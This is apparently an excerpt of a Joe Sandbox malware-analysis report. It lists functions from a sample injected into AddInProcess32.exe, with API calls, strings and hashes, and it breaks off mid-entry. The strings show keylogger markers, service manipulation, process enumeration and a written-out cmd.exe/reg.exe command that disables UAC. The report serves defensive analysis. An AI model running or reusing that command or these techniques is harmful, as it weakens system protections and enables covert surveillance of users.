                                                                                                  Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe
                                                                                                  • String ID:
                                                                                                  • API String ID: 4189289331-0
                                                                                                  • Opcode ID: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                                                                                  • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                  • Opcode Fuzzy Hash: dfe269b3e7c89c95b27fedd159a696e88b5656ec827068c0169833f59e794ee9
                                                                                                  • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                  Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                  • String ID:
                                                                                                  • API String ID: 493672254-0
                                                                                                  • Opcode ID: 6768d04de6bba430942b0409d96819e7e0e6ab90830dc8ea3fc78fe1771b3c5b
                                                                                                  • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                  • Opcode Fuzzy Hash: 6768d04de6bba430942b0409d96819e7e0e6ab90830dc8ea3fc78fe1771b3c5b
                                                                                                  • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                  Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                  • _free.LIBCMT ref: 004482CC
                                                                                                  • _free.LIBCMT ref: 004482F4
                                                                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                  • _abort.LIBCMT ref: 00448313
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 3160817290-0
                                                                                                  • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                  • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                  • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                  • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                  Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                  • String ID:
                                                                                                  • API String ID: 221034970-0
                                                                                                  • Opcode ID: ae1d2dc5fcc920fa0c4de2805c4bb02fd0d2400c89c15f2023f51b2330037a2a
                                                                                                  • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                  • Opcode Fuzzy Hash: ae1d2dc5fcc920fa0c4de2805c4bb02fd0d2400c89c15f2023f51b2330037a2a
                                                                                                  • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                  Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                  • String ID:
                                                                                                  • API String ID: 221034970-0
                                                                                                  • Opcode ID: 09157ef8eb8da34f78b0ee302db87b690a61261d17d0987fe2a8bb4e8e1c1ff6
                                                                                                  • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                  • Opcode Fuzzy Hash: 09157ef8eb8da34f78b0ee302db87b690a61261d17d0987fe2a8bb4e8e1c1ff6
                                                                                                  • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                  Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                  • String ID:
                                                                                                  • API String ID: 221034970-0
                                                                                                  • Opcode ID: b26bf3762530a856ab6d8755ba7de06de94296f9b4710ed3a1167deef3457c09
                                                                                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                  • Opcode Fuzzy Hash: b26bf3762530a856ab6d8755ba7de06de94296f9b4710ed3a1167deef3457c09
                                                                                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                  Function 00456C9A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID: @^E
                                                                                                  • API String ID: 269201875-2908066071
                                                                                                  • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                  • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                  • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                  • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                  Function 004434D5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443515
                                                                                                  • _free.LIBCMT ref: 004435E0
                                                                                                  • _free.LIBCMT ref: 004435EA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$FileModuleName
                                                                                                  • String ID: 88$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  • API String ID: 2506810119-4049637526
                                                                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                  Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                                                                  • wsprintfW.USER32 ref: 0040B22E
                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EventLocalTimewsprintf
                                                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                  • API String ID: 1497725170-248792730
                                                                                                  • Opcode ID: f6bdf37b764397ecfd397d8500b9a2d9bfc283fa5d72d0792e8994da5c0756f8
                                                                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                  • Opcode Fuzzy Hash: f6bdf37b764397ecfd397d8500b9a2d9bfc283fa5d72d0792e8994da5c0756f8
                                                                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                  Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                                  • String ID: hQG
                                                                                                  • API String ID: 1958988193-4070439852
                                                                                                  • Opcode ID: dff8f098f1c377594146863248cdb80fbfdf91f527f5f89ea2521ad03e4bff88
                                                                                                  • Instruction ID: fcd55a72cf9b38ed92eee25b8fc798016c5179a181dae4a4499eb8880f316315
                                                                                                  • Opcode Fuzzy Hash: dff8f098f1c377594146863248cdb80fbfdf91f527f5f89ea2521ad03e4bff88
                                                                                                  • Instruction Fuzzy Hash: 3E113130600740AADA30A7249889A1F37BAD741356F44483EE182676D3C67DDC64C71F
                                                                                                  Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                  • GetLastError.KERNEL32 ref: 0041D611
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                  • String ID: 0$MsgWindowClass
                                                                                                  • API String ID: 2877667751-2410386613
                                                                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                  Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                  Strings
                                                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreateProcess
                                                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                  • API String ID: 2922976086-4183131282
                                                                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                  Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002), ref: 004433FA
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002), ref: 00443430
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                  Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474F08,00404E7A,00000001,?,00000000,00474F08,00404CA8,00000000,?,?,00000000), ref: 00405120
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000), ref: 0040512C
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00474F08,00404CA8,00000000,?,?,00000000), ref: 00405137
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000), ref: 00405140
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                  • String ID: KeepAlive | Disabled
                                                                                                  • API String ID: 2993684571-305739064
                                                                                                  • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                  • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                  Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                  • String ID: Alarm triggered
                                                                                                  • API String ID: 614609389-2816303416
                                                                                                  • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                  • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                  Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                                                  Strings
                                                                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                  • API String ID: 3024135584-2418719853
                                                                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                  Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                  • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                  Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475348), ref: 0041C08B
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 4269425633-0
                                                                                                  • Opcode ID: db79130361b4b0464cab85a352f134925f668321788b49065da1d952b70fcd3f
